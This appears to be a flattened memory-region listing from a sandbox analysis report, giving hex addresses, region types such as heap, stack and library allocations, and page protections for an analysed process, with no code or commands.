||
|
158DFFFC000
|
heap
|
page read and write
|
||
|
7FFAAB810000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB8B0000
|
trusted library allocation
|
page read and write
|
||
|
158E1F50000
|
heap
|
page execute and read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1B00045B000
|
trusted library allocation
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
1FA6741B000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1FA67538000
|
heap
|
page read and write
|
||
|
1FA64ABE000
|
heap
|
page read and write
|
||
|
1FA6738F000
|
heap
|
page read and write
|
||
|
158E2433000
|
trusted library allocation
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
1FA66B23000
|
heap
|
page read and write
|
||
|
1FA64A7B000
|
heap
|
page read and write
|
||
|
1FA668B2000
|
heap
|
page read and write
|
||
|
1FA64A7F000
|
heap
|
page read and write
|
||
|
1FA66BFD000
|
heap
|
page read and write
|
||
|
158FA068000
|
heap
|
page read and write
|
||
|
1B00007D000
|
trusted library allocation
|
page read and write
|
||
|
158E2501000
|
trusted library allocation
|
page read and write
|
||
|
1FA67535000
|
heap
|
page read and write
|
||
|
1FA668BE000
|
heap
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
1FA668B7000
|
heap
|
page read and write
|
||
|
1FA6752F000
|
heap
|
page read and write
|
||
|
1B000223000
|
trusted library allocation
|
page read and write
|
||
|
1FA668CE000
|
heap
|
page read and write
|
||
|
158E23FE000
|
trusted library allocation
|
page read and write
|
||
|
1FA668B3000
|
heap
|
page read and write
|
||
|
1FA668DD000
|
heap
|
page read and write
|
||
|
1FA67714000
|
heap
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
1FA6753D000
|
heap
|
page read and write
|
||
|
1FA64AA6000
|
heap
|
page read and write
|
||
|
1FA64AB8000
|
heap
|
page read and write
|
||
|
1FA64A95000
|
heap
|
page read and write
|
||
|
158E0200000
|
heap
|
page read and write
|
||
|
1FA649ED000
|
heap
|
page read and write
|
||
|
158FA4B0000
|
heap
|
page read and write
|
||
|
1FA66CA0000
|
heap
|
page read and write
|
||
|
7FFAAB756000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FFB37E000
|
stack
|
page read and write
|
||
|
158FA2B6000
|
heap
|
page read and write
|
||
|
4C613FE000
|
stack
|
page read and write
|
||
|
7FFAAB980000
|
trusted library allocation
|
page read and write
|
||
|
5FFAEFD000
|
stack
|
page read and write
|
||
|
1FA66BFD000
|
heap
|
page read and write
|
||
|
158E23CC000
|
trusted library allocation
|
page read and write
|
||
|
1FA668C6000
|
heap
|
page read and write
|
||
|
1FA64CB0000
|
heap
|
page read and write
|
||
|
158FA057000
|
heap
|
page execute and read and write
|
||
|
5FFB07D000
|
stack
|
page read and write
|
||
|
7FFAAB950000
|
trusted library allocation
|
page read and write
|
||
|
1B010001000
|
trusted library allocation
|
page read and write
|
||
|
1FA668BE000
|
heap
|
page read and write
|
||
|
1FA668B5000
|
heap
|
page read and write
|
||
|
158FA050000
|
heap
|
page execute and read and write
|
||
|
1FA66BD0000
|
heap
|
page read and write
|
||
|
1FA668F7000
|
heap
|
page read and write
|
||
|
1FA64A4B000
|
heap
|
page read and write
|
||
|
7FFAAB680000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB730000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAB82A000
|
trusted library allocation
|
page read and write
|
||
|
1FA67366000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
4C618BB000
|
stack
|
page read and write
|
||
|
158E0205000
|
heap
|
page read and write
|
||
|
158E2097000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A47000
|
heap
|
page read and write
|
||
|
4C6153E000
|
stack
|
page read and write
|
||
|
7FFAAB890000
|
trusted library allocation
|
page read and write
|
||
|
1FA66BAA000
|
heap
|
page read and write
|
||
|
158E1F70000
|
heap
|
page execute and read and write
|
||
|
F4C80FB000
|
stack
|
page read and write
|
||
|
7FFAAB672000
|
trusted library allocation
|
page read and write
|
||
|
1FA66BAA000
|
heap
|
page read and write
|
||
|
1FA67538000
|
heap
|
page read and write
|
||
|
1B0064ED000
|
trusted library allocation
|
page read and write
|
||
|
158DFFC9000
|
heap
|
page read and write
|
||
|
1FA66B51000
|
heap
|
page read and write
|
||
|
1FA66BBB000
|
heap
|
page read and write
|
||
|
158E20EF000
|
trusted library allocation
|
page read and write
|
||
|
1FA67730000
|
heap
|
page read and write
|
||
|
4C614BE000
|
stack
|
page read and write
|
||
|
4C6147E000
|
stack
|
page read and write
|
||
|
7FFAAB930000
|
trusted library allocation
|
page read and write
|
||
|
158DFF30000
|
heap
|
page read and write
|
||
|
4C61073000
|
stack
|
page read and write
|
||
|
1FA668F6000
|
heap
|
page read and write
|
||
|
1FA66C10000
|
heap
|
page read and write
|
||
|
1B00529C000
|
trusted library allocation
|
page read and write
|
||
|
1B010011000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA67415000
|
heap
|
page read and write
|
||
|
158E1F9F000
|
trusted library allocation
|
page read and write
|
||
|
1FA649F2000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1FA67387000
|
heap
|
page read and write
|
||
|
1FA668BA000
|
heap
|
page read and write
|
||
|
1FA67526000
|
heap
|
page read and write
|
||
|
7FFAAB920000
|
trusted library allocation
|
page read and write
|
||
|
F4C79FE000
|
stack
|
page read and write
|
||
|
5FFBECE000
|
stack
|
page read and write
|
||
|
1FA67397000
|
heap
|
page read and write
|
||
|
1FA66BE1000
|
heap
|
page read and write
|
||
|
1FA64A10000
|
heap
|
page read and write
|
||
|
7FFAAB960000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A1E000
|
heap
|
page read and write
|
||
|
1FA64A74000
|
heap
|
page read and write
|
||
|
1FA649F1000
|
heap
|
page read and write
|
||
|
F4C7BFB000
|
stack
|
page read and write
|
||
|
1FA67518000
|
heap
|
page read and write
|
||
|
5FFB0F9000
|
stack
|
page read and write
|
||
|
158E1FEC000
|
trusted library allocation
|
page read and write
|
||
|
1B003E9C000
|
trusted library allocation
|
page read and write
|
||
|
158DFFFA000
|
heap
|
page read and write
|
||
|
158FA2AD000
|
heap
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
1FA668B4000
|
heap
|
page read and write
|
||
|
1FA66BE1000
|
heap
|
page read and write
|
||
|
158E20EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB67D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA66B6F000
|
heap
|
page read and write
|
||
|
1FA64B90000
|
heap
|
page read and write
|
||
|
1FA64A51000
|
heap
|
page read and write
|
||
|
1FA67661000
|
heap
|
page read and write
|
||
|
1B0116F9000
|
trusted library allocation
|
page read and write
|
||
|
158E269E000
|
trusted library allocation
|
page read and write
|
||
|
158E2599000
|
trusted library allocation
|
page read and write
|
||
|
1FA6751C000
|
heap
|
page read and write
|
||
|
1FA66F60000
|
trusted library allocation
|
page read and write
|
||
|
1FA668C0000
|
heap
|
page read and write
|
||
|
1FA67714000
|
heap
|
page read and write
|
||
|
5FFB178000
|
stack
|
page read and write
|
||
|
7FFAAB8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB8E0000
|
trusted library allocation
|
page read and write
|
||
|
5FFAB8E000
|
stack
|
page read and write
|
||
|
158FA2A4000
|
heap
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
4C6117E000
|
stack
|
page read and write
|
||
|
1B0102F9000
|
trusted library allocation
|
page read and write
|
||
|
4C6173E000
|
stack
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
1FA64A68000
|
heap
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
158E26A0000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A4C000
|
heap
|
page read and write
|
||
|
1FA6744C000
|
heap
|
page read and write
|
||
|
7FFAAB821000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B71000
|
heap
|
page read and write
|
||
|
7FFAAB940000
|
trusted library allocation
|
page read and write
|
||
|
1FA67660000
|
heap
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
158E26B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB8F0000
|
trusted library allocation
|
page read and write
|
||
|
158FA2A2000
|
heap
|
page read and write
|
||
|
1FA668D1000
|
heap
|
page read and write
|
||
|
1FA649A0000
|
heap
|
page read and write
|
||
|
1B000457000
|
trusted library allocation
|
page read and write
|
||
|
1FA6751F000
|
heap
|
page read and write
|
||
|
F4C74FE000
|
stack
|
page read and write
|
||
|
1FA668B5000
|
heap
|
page read and write
|
||
|
1FA64AA6000
|
heap
|
page read and write
|
||
|
4C6137E000
|
stack
|
page read and write
|
||
|
1FA67480000
|
heap
|
page read and write
|
||
|
1FA64A78000
|
heap
|
page read and write
|
||
|
1FA64A74000
|
heap
|
page read and write
|
||
|
1FA668B1000
|
heap
|
page read and write
|
||
|
1B00041E000
|
trusted library allocation
|
page read and write
|
||
|
1B000E5B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB900000
|
trusted library allocation
|
page read and write
|
||
|
1FA66E80000
|
heap
|
page read and write
|
||
|
1FA66B79000
|
heap
|
page read and write
|
||
|
1B0003F6000
|
trusted library allocation
|
page read and write
|
||
|
5FFB3FE000
|
stack
|
page read and write
|
||
|
1FA668DE000
|
heap
|
page read and write
|
||
|
158FA260000
|
heap
|
page read and write
|
||
|
158E1AF0000
|
heap
|
page read and write
|
||
|
7FFAAB830000
|
trusted library allocation
|
page execute and read and write
|
||
|
158E20AB000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B51000
|
heap
|
page read and write
|
||
|
158F1FF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
1B000001000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B86000
|
heap
|
page read and write
|
||
|
1FA66D70000
|
heap
|
page read and write
|
||
|
1FA668B0000
|
heap
|
page read and write
|
||
|
1FA64A78000
|
heap
|
page read and write
|
||
|
F4C75FE000
|
stack
|
page read and write
|
||
|
1FA668F6000
|
heap
|
page read and write
|
||
|
158FA268000
|
heap
|
page read and write
|
||
|
1FA676C6000
|
heap
|
page read and write
|
||
|
5FFAF7E000
|
stack
|
page read and write
|
||
|
1FA668C1000
|
heap
|
page read and write
|
||
|
158E01D0000
|
heap
|
page readonly
|
||
|
1FA66F50000
|
heap
|
page read and write
|
||
|
1FA64A47000
|
heap
|
page read and write
|
||
|
158E1FD0000
|
trusted library allocation
|
page read and write
|
||
|
158E2018000
|
trusted library allocation
|
page read and write
|
||
|
1FA66BA3000
|
heap
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
1FA66B78000
|
heap
|
page read and write
|
||
|
158FA11F000
|
heap
|
page read and write
|
||
|
1FA649EC000
|
heap
|
page read and write
|
||
|
1B010070000
|
trusted library allocation
|
page read and write
|
||
|
158DFFB0000
|
heap
|
page read and write
|
||
|
4C610FE000
|
stack
|
page read and write
|
||
|
158FA060000
|
heap
|
page read and write
|
||
|
1FA66BBB000
|
heap
|
page read and write
|
||
|
5FFB4FB000
|
stack
|
page read and write
|
||
|
1FA64A2D000
|
heap
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
158E2541000
|
trusted library allocation
|
page read and write
|
||
|
1FA6767D000
|
heap
|
page read and write
|
||
|
1FA66560000
|
heap
|
page read and write
|
||
|
158E20AE000
|
trusted library allocation
|
page read and write
|
||
|
158E01E0000
|
trusted library allocation
|
page read and write
|
||
|
1B005C9C000
|
trusted library allocation
|
page read and write
|
||
|
4C612FE000
|
stack
|
page read and write
|
||
|
1FA67518000
|
heap
|
page read and write
|
||
|
1FA64CB5000
|
heap
|
page read and write
|
||
|
1FA673EB000
|
heap
|
page read and write
|
||
|
5FFABCE000
|
stack
|
page read and write
|
||
|
7FFAAB990000
|
trusted library allocation
|
page read and write
|
||
|
1FA673C0000
|
heap
|
page read and write
|
||
|
1FA67388000
|
heap
|
page read and write
|
||
|
158E0047000
|
heap
|
page read and write
|
||
|
158E1F81000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1FA64A47000
|
heap
|
page read and write
|
||
|
1FA66B51000
|
heap
|
page read and write
|
||
|
1B00041A000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B79000
|
heap
|
page read and write
|
||
|
158E01A0000
|
trusted library allocation
|
page read and write
|
||
|
1B003A9B000
|
trusted library allocation
|
page read and write
|
||
|
1FA67415000
|
heap
|
page read and write
|
||
|
7FFAAB674000
|
trusted library allocation
|
page read and write
|
||
|
158DFF90000
|
heap
|
page read and write
|
||
|
7FFAAB790000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FA67535000
|
heap
|
page read and write
|
||
|
1FA67550000
|
heap
|
page read and write
|
||
|
158DFF20000
|
heap
|
page read and write
|
||
|
1FA66AF0000
|
remote allocation
|
page read and write
|
||
|
7FFAAB8C0000
|
trusted library allocation
|
page read and write
|
||
|
158FA2EA000
|
heap
|
page read and write
|
||
|
1B00309B000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A66000
|
heap
|
page read and write
|
||
|
158E0042000
|
heap
|
page read and write
|
||
|
1FA66B73000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
7FFAAB8D0000
|
trusted library allocation
|
page read and write
|
||
|
158E23B5000
|
trusted library allocation
|
page read and write
|
||
|
5FFAB0E000
|
stack
|
page read and write
|
||
|
158E20B4000
|
trusted library allocation
|
page read and write
|
||
|
158FA13E000
|
heap
|
page read and write
|
||
|
1FA668D7000
|
heap
|
page read and write
|
||
|
7DF47B2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
158E209D000
|
trusted library allocation
|
page read and write
|
||
|
158E23DA000
|
trusted library allocation
|
page read and write
|
||
|
5FFAE7E000
|
stack
|
page read and write
|
||
|
7FFAAB870000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B69000
|
heap
|
page read and write
|
||
|
158E200E000
|
trusted library allocation
|
page read and write
|
||
|
158F1F81000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1FA64A95000
|
heap
|
page read and write
|
||
|
158E2519000
|
trusted library allocation
|
page read and write
|
||
|
1FA66AF0000
|
remote allocation
|
page read and write
|
||
|
1FA674B8000
|
heap
|
page read and write
|
||
|
1FA668DF000
|
heap
|
page read and write
|
||
|
1FA64A47000
|
heap
|
page read and write
|
||
|
1FA64AB8000
|
heap
|
page read and write
|
||
|
F4C78FE000
|
stack
|
page read and write
|
||
|
1FA674F4000
|
heap
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
1FA67714000
|
heap
|
page read and write
|
||
|
158E20A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
7FFAAB860000
|
trusted library allocation
|
page execute and read and write
|
||
|
158E254E000
|
trusted library allocation
|
page read and write
|
||
|
1FA66D90000
|
heap
|
page read and write
|
||
|
1FA64A7B000
|
heap
|
page read and write
|
||
|
158E1AF6000
|
heap
|
page read and write
|
There are 373 hidden memdumps, click here to show them.